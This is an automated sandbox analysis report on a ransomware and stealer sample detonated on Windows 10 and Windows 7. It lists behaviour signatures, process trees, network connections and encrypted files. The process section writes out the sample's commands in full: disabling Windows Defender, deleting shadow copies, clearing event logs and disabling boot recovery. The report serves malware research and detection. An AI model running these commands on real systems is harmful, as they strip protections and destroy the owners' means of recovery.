Malware Analysis Report

2024-10-16 03:12

Sample ID 220112-x5evksdgdl
Target cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.7z
SHA256 d1b1f52ea8a58a52734e8e5a87838cbc1b0cdc277194a5390912127b1f1a208d
Tags: evasion ransomware trojan spyware stealer
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V6
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: d1b1f52ea8a58a52734e8e5a87838cbc1b0cdc277194a5390912127b1f1a208d

Threat Level: Known bad

The file cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.7z was found to be: Known bad.

Malicious Activity Summary

Tags: evasion ransomware trojan spyware stealer

Deletes Windows Defender Definitions

Modifies Windows Defender Real-time Protection settings

Modifies security service

Modifies boot configuration data using bcdedit

Deletes shadow copies

Clears Windows event logs

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Suspicious behavior: EnumeratesProcesses

Runs net.exe

Modifies registry class

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2022-01-12 19:25

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2022-01-12 19:25
Reported: 2022-01-12 19:31
Platform: win10-en-20211208
Max time kernel: 17s
Max time network: 123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Drops file in Program Files directory


Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2504 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 3736 wrote to memory of 768 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 3012 wrote to memory of 3328 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1284 wrote to memory of 1620 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2208 wrote to memory of 592 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2804 wrote to memory of 2248 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1896 wrote to memory of 3544 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 4068 wrote to memory of 2660 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1344 wrote to memory of 2032 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 728 wrote to memory of 2984 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 3924 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12fd9" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12fd9" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12fd9" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.12.19:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0f9706913217c1dd037d5cfdff5eab3a
SHA1 68fd09dc8da2c9519454e985b70d7fb2206e1bdd
SHA256 0432db16265d3d0e4c0abd691e771c95a007b9b5d31b3662a70893cae0493cb8
SHA512 58f936800fdb4e1630048042d9e2c545f7678dd34849cef726062de198b3f2c997f49d3703f6b6acdc441011f2575f499033057cf3a884d413017855663ec8ac

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 19:25

Reported

2022-01-12 19:31

Platform

win7-en-20211208

Max time kernel

44s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_shAMFEMgwT80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\THMBNAIL.PNG.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_oahjWh0W5XI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_M8XkCRnD5WY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcer.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21421_.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_g9rixWu2cG80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\CollectSignatures_Init.xsn.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_KYVLwIVd6Kw0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_mdM9cGavobQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_INkUS0-cPBY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR2F.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_RfLNRchu-OI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
